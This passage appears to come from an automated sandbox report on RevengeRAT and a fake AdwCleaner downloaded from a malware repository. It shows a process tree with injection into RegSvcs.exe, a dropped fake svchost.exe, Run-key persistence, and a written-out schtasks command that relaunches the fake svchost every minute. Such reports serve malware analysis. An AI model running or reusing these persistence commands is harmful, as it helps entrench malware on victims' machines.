Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
7896	attrib.exe
7892	attrib.exe
6124	attrib.exe
5520	attrib.exe
7412	attrib.exe
7676	attrib.exe

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://github.com/Da2dalus/The-MALWARE-Repo"
1⤵
- Suspicious use of WriteProcessMemory
PID:3180
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://github.com/Da2dalus/The-MALWARE-Repo
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1512
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dcfedfc8-3bc1-4984-8ac9-053ec6e54560} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" gpu
    3⤵
    PID:1972
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20240401114208 -prefsHandle 2416 -prefMapHandle 2412 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd1c528e-7439-415a-bb70-6dcc47ece4a7} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" socket
    3⤵
    PID:2588
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3276 -childID 1 -isForBrowser -prefsHandle 3228 -prefMapHandle 3172 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7571d20-a4f2-430f-9ecf-98bdfb5f6460} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:4784
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3748 -childID 2 -isForBrowser -prefsHandle 3740 -prefMapHandle 3736 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f1d09234-e3d8-4011-9a14-ef247a81b762} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:4984
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3912 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4476 -prefMapHandle 4468 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4f1294a-cff3-4e7c-a738-caa5ebee2046} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" utility
    3⤵
    - Checks processor information in registry
    PID:1384
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5264 -childID 3 -isForBrowser -prefsHandle 5256 -prefMapHandle 5252 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d9d36a0-76e2-4dbf-a348-c1bb88185e74} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:2744
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5408 -childID 4 -isForBrowser -prefsHandle 5488 -prefMapHandle 5484 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e1450c9-a547-4135-a00c-f38905a6ee93} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:4788
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5624 -childID 5 -isForBrowser -prefsHandle 5632 -prefMapHandle 4940 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b4f4a93-2bf4-418e-9f0a-25819e1a9368} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:4484
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6020 -childID 6 -isForBrowser -prefsHandle 6000 -prefMapHandle 6064 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6889cde8-0198-4464-8743-15ebc18dce0c} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:5440
- - C:\Users\Admin\Downloads\RevengeRAT(1).exe
    "C:\Users\Admin\Downloads\RevengeRAT(1).exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:5252
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
      4⤵
      Drops startup file
      Suspicious use of SetThreadContext
      NTFS ADS
      Suspicious use of AdjustPrivilegeToken
      PID:5400
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        5⤵
        
        PID:5464
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\vsxyl0tx.cmdline"
        5⤵
        
        PID:6048
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nklzfuxx.cmdline"
        5⤵
        
        PID:5376
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\iothm9ir.cmdline"
        5⤵
        
        PID:6004
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hycb1u1h.cmdline"
        5⤵
        
        PID:5144
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fbe_aebf.cmdline"
        5⤵
        
        PID:848
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\0xjyskcd.cmdline"
        5⤵
        
        PID:4880
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\domfqfly.cmdline"
        5⤵
        
        PID:2668
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\_9cp2sfv.cmdline"
        5⤵
        
        PID:5564
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\b6krax3g.cmdline"
        5⤵
        
        PID:5796
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pbpgppnz.cmdline"
        5⤵
        
        PID:4572
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\cqecutin.cmdline"
        5⤵
        
        PID:800
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\_bhazcoy.cmdline"
        5⤵
        
        PID:3092
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\amm4kqot.cmdline"
        5⤵
        
        PID:5700
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\i8r-i4vo.cmdline"
        5⤵
        
        PID:940
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qjpwlmt1.cmdline"
        5⤵
        
        PID:4344
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zq1ws7sq.cmdline"
        5⤵
        
        PID:2308
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nwvv09e4.cmdline"
        5⤵
        
        PID:5156
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ql-ri5na.cmdline"
        5⤵
        
        PID:5236
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\z7qjd3rs.cmdline"
        5⤵
        
        PID:4948
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\y96y9ylt.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2368
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\usvuu8ni.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5784
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ckm100gb.cmdline"
        5⤵
        
        PID:1028
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4572
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6EF1.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc130C30E6C374454B98B2EBDFEBB32468.TMP"
        6⤵
        
        PID:5832
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:5760
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        6⤵
        Drops startup file
        Adds Run key to start application
        Suspicious use of SetThreadContext
        NTFS ADS
        Suspicious use of AdjustPrivilegeToken
        
        PID:1236
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        7⤵
        
        PID:5720
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4836
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nbhhnhj0.cmdline"
        7⤵
        
        PID:1460
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES46A4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7BB786628EB640C580A52374DF6D9AC0.TMP"
        8⤵
        
        PID:4024
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\kpl9lptl.cmdline"
        7⤵
        
        PID:5080
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES478E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc782A88368D624B47AB26D8BCD344153.TMP"
        8⤵
        
        PID:5208
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ohnnw6p4.cmdline"
        7⤵
        
        PID:6064
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4869.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF6AD3FDCFFEB484E8DF73EA4F4AF7F33.TMP"
        8⤵
        
        PID:3200
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\htzwwy9c.cmdline"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1148
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4915.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF0DE8CE7584148E6ABABC4C3CB9317A9.TMP"
        8⤵
        
        PID:5724
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\y6itcksh.cmdline"
        7⤵
        
        PID:1336
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4A2E.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc230A71C1AF8343F394FE8F2BB23B9464.TMP"
        8⤵
        
        PID:524
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\w4whybph.cmdline"
        7⤵
        
        PID:3692
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4B76.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF40F9743DE034163853C6E0D7651FDE.TMP"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2596
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\2q7z5xnz.cmdline"
        7⤵
        
        PID:5128
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4C61.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc10C790FA337148E3872B5164B516C6E.TMP"
        8⤵
        
        PID:5596
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mvsf4ehh.cmdline"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4484
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4D7A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF164A34D57EF4B9CB2F848F961D6F8F.TMP"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3676
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\odtp7dzq.cmdline"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5676
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4E07.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9A1BCF883F2245ADB831335C784A21E1.TMP"
        8⤵
        
        PID:3824
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ecr7duld.cmdline"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3296
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4F10.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC4B5D6843ECE485EAD4DD8E941938AE1.TMP"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3456
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lbl7snzx.cmdline"
        7⤵
        
        PID:6092
- - C:\Users\Admin\Downloads\AdwereCleaner.exe
    "C:\Users\Admin\Downloads\AdwereCleaner.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:5720
  - - C:\Users\Admin\AppData\Local\6AdwCleaner.exe
      "C:\Users\Admin\AppData\Local\6AdwCleaner.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Modifies system certificate store
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:2432
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5360 -childID 7 -isForBrowser -prefsHandle 5336 -prefMapHandle 5332 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aebb5286-fd3e-47f1-b3e3-1f53a8944968} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:5416
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5648 -childID 8 -isForBrowser -prefsHandle 5596 -prefMapHandle 5612 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c7689a2-ec06-4732-b1a6-870a1ece5cfe} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:5432
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7216 -childID 9 -isForBrowser -prefsHandle 5628 -prefMapHandle 5604 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6a80064-56c4-4701-91c5-bfa4c9e328cc} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:5540
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7892 -childID 10 -isForBrowser -prefsHandle 7852 -prefMapHandle 7884 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3ea35a14-4650-4f61-84bb-dcfe77cdedb0} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:2012
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8092 -childID 11 -isForBrowser -prefsHandle 8096 -prefMapHandle 8024 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e1f57ce-20b5-4df2-93bc-47f6ffe903d7} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:5272
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7744 -childID 12 -isForBrowser -prefsHandle 7820 -prefMapHandle 7804 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c589986c-7788-47ec-91ee-5821842f9936} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:5628
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7764 -childID 13 -isForBrowser -prefsHandle 7776 -prefMapHandle 7592 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6fa26b80-80e1-4fdc-8231-674d4a43472b} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:5724
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8420 -childID 14 -isForBrowser -prefsHandle 8392 -prefMapHandle 8400 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a0320d2-2444-4ab1-baac-5abb89140e68} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:4460
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8444 -childID 15 -isForBrowser -prefsHandle 5376 -prefMapHandle 8552 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ad43d2b-7c03-417a-903b-2040e740d744} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:5124
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8000 -parentBuildID 20240401114208 -prefsHandle 8396 -prefMapHandle 8392 -prefsLen 30628 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed011764-bd40-4183-bf68-4cc44ef2bc32} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" rdd
    3⤵
    PID:2984
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7320 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 5612 -prefMapHandle 7316 -prefsLen 30628 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {705ba892-fe48-4092-94f7-7ccfb9f3c90f} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" utility
    3⤵
    - Checks processor information in registry
    PID:1980
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8828 -childID 16 -isForBrowser -prefsHandle 5376 -prefMapHandle 8672 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {07f28168-7957-4eb4-8c6e-418a930de355} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:4136
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8556 -childID 17 -isForBrowser -prefsHandle 9276 -prefMapHandle 9332 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b42b49bb-d078-46d5-a412-c9bfc7eed2be} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:732
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9712 -childID 18 -isForBrowser -prefsHandle 9696 -prefMapHandle 9576 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {47a8f31d-79e6-4820-9cbd-d29ac2b4b010} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:728
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9924 -childID 19 -isForBrowser -prefsHandle 9916 -prefMapHandle 9912 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {414ff039-50e2-4135-8067-0a849aac6bed} 1512 "\\.\pipe\gecko-crash-server-pipe.1512" tab
    3⤵
    PID:5436
- - C:\Program Files\Mozilla Firefox\firefox.exe
